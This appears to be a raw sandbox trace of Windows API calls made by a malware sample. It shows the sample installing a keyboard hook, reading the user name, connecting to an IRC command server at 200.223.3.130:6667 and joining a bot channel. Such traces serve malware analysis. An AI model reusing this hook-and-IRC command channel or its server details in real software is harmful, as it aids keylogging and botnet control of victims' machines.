**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FFB1
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500010E8)
KERNEL32!TlsSetValue (0x00000001,0x20070F00)
KERNEL32!GetModuleHandleA (NULL)
USER32!SetWindowsHookExA (0x0000000D,0x00402000,0x00400000,0x00000000)
USER32!wsprintfA (0x4FFB1724,"Creates WindowsHook monitoring %s activity",0x77D37A40....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072009
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77D35A5A accessing page 0x00077D33
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x733C1014 accessing page 0x000733C4
WSOCK32!WSACleanup ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x733C2C94 accessing page 0x000733C3
KERNEL32!Sleep (0x00000000)
WSOCK32!WSAStartup (0x00000101,0x0040A500)
WSOCK32!htons (0x00001A0B)
WSOCK32!inet_addr ("200.223.3.130")
WSOCK32!socket (0x00000002,0x00000001,0x00000006)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7335128D accessing page 0x00073354
KERNEL32!HeapAlloc (0x00000000,0x00000000,0x00000464)
WSOCK32!connect (0x00000001,0x0040A330,0x00000010)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x73353848 accessing page 0x00073358
USER32!wsprintfA (0x73358695,"%3d.%3d.%3d.%3d",0x000000C8....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7335140B accessing page 0x00073355
-connect port 06667, ["TCP"] IP "200.223.3.130"
USER32!wsprintfA (0x73358695,"%3d.%3d.%3d.%3d",0x000000C8....)
USER32!wsprintfA (0x4FFD0478,"Connects to "%s" on port %5d (%s)
",0x73358695....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003450 accessing page 0x00073356
USER32!wsprintfA (0x73356F91,":%s %s %s :%s
",0x733566E6....)
USER32!wsprintfA (0x73356FCF,":%s %s %s :%s
",0x733566E6....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77D360D1 accessing page 0x00073357
ADVAPI32!GetUserNameA (0x0040909C,0x4FFD053C)
KERNEL32!GetLocalTime (0x4FFD0500)
KERNEL32!GetSystemTime (0x4FFD04F0)
KERNEL32!GetTimeZoneInformation (0x4FFD0444)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A050)
KERNEL32!InitializeCriticalSection (0x20070EE0)
KERNEL32!LeaveCriticalSection (0x0040A050)
KERNEL32!EnterCriticalSection (0x20070EE0)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A050)
KERNEL32!InitializeCriticalSection (0x20070EC0)
KERNEL32!LeaveCriticalSection (0x0040A050)
KERNEL32!EnterCriticalSection (0x20070EC0)
KERNEL32!LeaveCriticalSection (0x20070EC0)
KERNEL32!GetTimeZoneInformation (0x0040A1D0)
KERNEL32!WideCharToMultiByte (0x00000000,0x00000220,0x0040A1D4,0xFFFFFFFF,0x00409B9C,0x0000003F,0x00000000,0x4FFD03E0)
KERNEL32!WideCharToMultiByte (0x00000000,0x00000220,0x0040A228,0xFFFFFFFF,0x00409BDC,0x0000003F,0x00000000,0x4FFD03E0)
KERNEL32!LeaveCriticalSection (0x20070EE0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!send (0x00000001,0x4FFD0330,0x0000001A,0x00000000)
4FFD0330 4E 49 43 4B 20 43 75 72 72 65 6E 74 55 73 65 72 NICK CurrentUser
4FFD0340 5B 46 52 4B 5D 5B 37 34 5D 0A [FRK][74].
USER32!wsprintfA (0x73356D91,"IRC: Uses nickname %s",0x73356C51....)
USER32!wsprintfA (0x73357005,"%s
",0x73356A0C....)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000004,0x00000000)
4FFD0760 3A 69 72 63 :irc
WSOCK32!send (0x00000001,0x4FFD0760,0x00000026,0x00000000)
4FFD0760 55 53 45 52 20 53 45 72 56 45 52 49 4E 4F 20 22 USER SErVERINO "
4FFD0770 46 52 4B 22 20 22 53 45 72 56 45 52 49 4E 4F 22 FRK" "SErVERINO"
4FFD0780 20 3A 46 52 4B 0A :FRK.
USER32!wsprintfA (0x73356D91,"IRC: Uses username %s",0x73356C91....)
USER32!wsprintfA (0x73357014,":%s %s %s :%s
",0x733566E6....)
USER32!wsprintfA (0x73357061,":%s %s %s :- %s Message of the Day -
",0x733566E6....)
USER32!wsprintfA (0x733570B2,":%s %s %s :%s
",0x733566E6....)
USER32!wsprintfA (0x733570F1,":%s %s %s :%s
",0x733566E6....)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000004,0x00000000)
4FFD0760 2E 66 6F 6F .foo
WSOCK32!send (0x00000001,0x4FFD0338,0x00000011,0x00000000)
4FFD0338 4A 4F 49 4E 20 23 53 6C 34 63 4B 5F 72 30 6F 54 JOIN #Sl4cK_r0oT
4FFD0348 0A .
USER32!wsprintfA (0x73356D91,"IRC: Joins channel %s",0x73356CF1....)
USER32!wsprintfA (0x73357132,":%s!%s@%s %s :%s
",0x73356C51....)
USER32!wsprintfA (0x73357182,":%s %s %s = %s :%s %s
",0x733566E6....)
USER32!wsprintfA (0x733571D8,":%s %s %s %s :End of /NAMES list.
",0x733566E6....)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
4FFD0760 6E 65 74 2E 63 6F 6D 20 4E 4F 54 49 43 45 20 41 net.com NOTICE A
4FFD0770 55 54 48 20 3A 2A 2A 2A 20 4C 6F 6F 6B 69 6E 67 UTH :*** Looking
4FFD0780 20 75 70 20 79 6F 75 72 20 68 6F 73 74 6E 61 6D up your hostnam
4FFD0790 65 2E 2E 2E 0D 0A 3A 69 72 63 2E 66 6F 6F 6E 65 e.....:irc.foone
4FFD07A0 74 2E 63 6F 6D 20 4E 4F 54 49 43 45 20 41 55 54 t.com NOTICE AUT
4FFD07B0 48 20 3A 2A 2A 2A 20 46 6F 75 6E 64 20 79 6F 75 H :*** Found you
4FFD07C0 72 20 68 6F 73 74 6E 61 6D 65 0D 0A 50 49 4E 47 r hostname..PING
4FFD07D0 20 3A 44 31 35 45 41 35 45 0D 0A 3A 69 72 63 2E :D15EA5E..:irc.
4FFD07E0 66 6F 6F 6E 65 74 2E 63 6F 6D 20 30 30 31 20 43 foonet.com 001 C
4FFD07F0 75 72 72 65 6E 74 55 73 65 72 5B 46 52 4B 5D 5B urrentUser[FRK][
4FFD0800 37 34 5D 20 3A 57 65 6C 63 6F 6D 65 20 74 6F 20 74] :Welcome to
4FFD0810 74 68 65 20 46 6F 6F 4E 65 74 20 49 52 43 20 4E the FooNet IRC N
4FFD0820 65 74 77 6F 72 6B 0D 0A 3A 69 72 63 2E 66 6F 6F etwork..:irc.foo
4FFD0830 6E 65 74 2E 63 6F 6D 20 33 37 35 20 43 75 72 72 net.com 375 Curr
4FFD0840 65 6E 74 55 73 65 72 5B 46 52 4B 5D 5B 37 34 5D entUser[FRK][74]
4FFD0850 20 3A 2D 20 69 72 63 2E 66 6F 6F 6E 65 74 2E 63 :- irc.foonet.c
4FFD0860 6F 6D 20 4D 65 73 73 61 67 65 20 6F 66 20 74 68 om Message of th
4FFD0870 65 20 44 61 79 20 2D 0D 0A 3A 69 72 63 2E 66 6F e Day -..:irc.fo
4FFD0880 6F 6E 65 74 2E 63 6F 6D 20 33 37 32 20 43 75 72 onet.com 372 Cur
4FFD0890 72 65 6E 74 55 73 65 72 5B 46 52 4B 5D 5B 37 34 rentUser[FRK][74
4FFD08A0 5D 20 3A 2D 20 48 65 6C 6C 6F 20 4D 72 2E 56 69 ] :- Hello Mr.Vi
4FFD08B0 72 75 73 20 3A 44 0D 0A 3A 69 72 63 2E 66 6F 6F rus :D..:irc.foo
4FFD08C0 6E 65 74 2E 63 6F 6D 20 33 37 36 20 43 75 72 72 net.com 376 Curr
4FFD08D0 65 6E 74 55 73 65 72 5B 46 52 4B 5D 5B 37 34 5D entUser[FRK][74]
4FFD08E0 20 3A 45 6E 64 20 6F 66 20 2F 4D 4F 54 44 20 63 :End of /MOTD c
4FFD08F0 6F 6D 6D 61 6E 64 2E 0D 0A 3A 43 75 72 72 65 6E ommand...:Curren
4FFD0900 74 55 73 65 72 5B 46 52 4B 5D 5B 37 34 5D 21 53 tUser[FRK][74]!S
4FFD0910 45 72 56 45 52 49 4E 4F 40 46 36 46 33 32 36 30 ErVERINO@F6F3260
4FFD0920 2E 43 39 45 39 37 33 46 46 2E 34 41 33 36 44 36 .C9E973FF.4A36D6
4FFD0930 42 32 2E 49 50 20 4A 4F 49 4E 20 3A 23 53 6C 34 B2.IP JOIN :#Sl4
4FFD0940 63 4B 5F 72 30 6F 54 0D 0A 3A 69 72 63 2E 66 6F cK_r0oT..:irc.fo
4FFD0950 6F 6E 65 74 2E 63 6F 6D 20 33 35 33 20 43 75 72 onet.com 353 Cur
4FFD0960 72 65 6E 74 55 73 65 72 5B 46 52 4B 5D 5B 37 34 rentUser[FRK][74
4FFD0970 5D 20 3D 20 23 53 6C 34 63 4B 5F 72 30 6F 54 20 ] = #Sl4cK_r0oT
4FFD0980 3A 43 75 72 72 65 6E 74 55 73 65 72 5B 46 52 4B :CurrentUser[FRK
4FFD0990 5D 5B 37 34 5D 20 49 52 43 5F 42 6F 62 0D 0A 3A ][74] IRC_Bob..:
4FFD09A0 69 72 63 2E 66 6F 6F 6E 65 74 2E 63 6F 6D 20 33 irc.foonet.com 3
4FFD09B0 36 36 20 43 75 72 72 65 6E 74 55 73 65 72 5B 46 66 CurrentUser[F
4FFD09C0 52 4B 5D 5B 37 34 5D 20 23 53 6C 34 63 4B 5F 72 RK][74] #Sl4cK_r
4FFD09D0 30 6F 54 20 3A 45 6E 64 20 6F 66 20 2F 4E 41 4D 0oT :End of /NAM
4FFD09E0 45 53 20 6C 69 73 74 2E 0D 0A ES list...
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070BF0,0x00000004,0x20070BF0)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF92
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x5000115C)
KERNEL32!TlsSetValue (0x00000001,0x20070BF0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x5000115C)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070BF0,0x00000004,0x20070BF0)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF72
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500011D0)
KERNEL32!TlsSetValue (0x00000001,0x20070BF0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500011D0)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070BF0,0x00000004,0x20070BF0)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF53
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001244)
KERNEL32!TlsSetValue (0x00000001,0x20070BF0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!send (0x00000001,0x4FF539A4,0x0000000E,0x00000000)
4FF539A4 50 4F 4E 47 20 3A 44 31 35 45 41 35 45 0A PONG :D15EA5E.
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001244)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF34
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500012B8)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500012B8)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF15
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200A
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x5000132C)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x5000132C)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070BA0,0x00000004,0x20070BA0)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FEF5
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500013A0)
KERNEL32!TlsSetValue (0x00000001,0x20070BA0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500013A0)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070BA0,0x00000004,0x20070BA0)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FED6
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200B
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001414)
KERNEL32!TlsSetValue (0x00000001,0x20070BA0)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001414)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FEB7
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001488)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001488)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FE98
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500014FC)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500014FC)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FE78
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200C
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001570)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001570)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200D
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 23 53 6C 34 63 4B 5F 72 30 6F 54 20 MSG #Sl4cK_r0oT
4FFD07A0 3A 48 65 6C 6C 6F 20 65 76 65 72 79 6F 6E 65 21 :Hello everyone!
4FFD07B0 0D 0A ..
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FE59
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500015E4)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500015E4)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200E
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
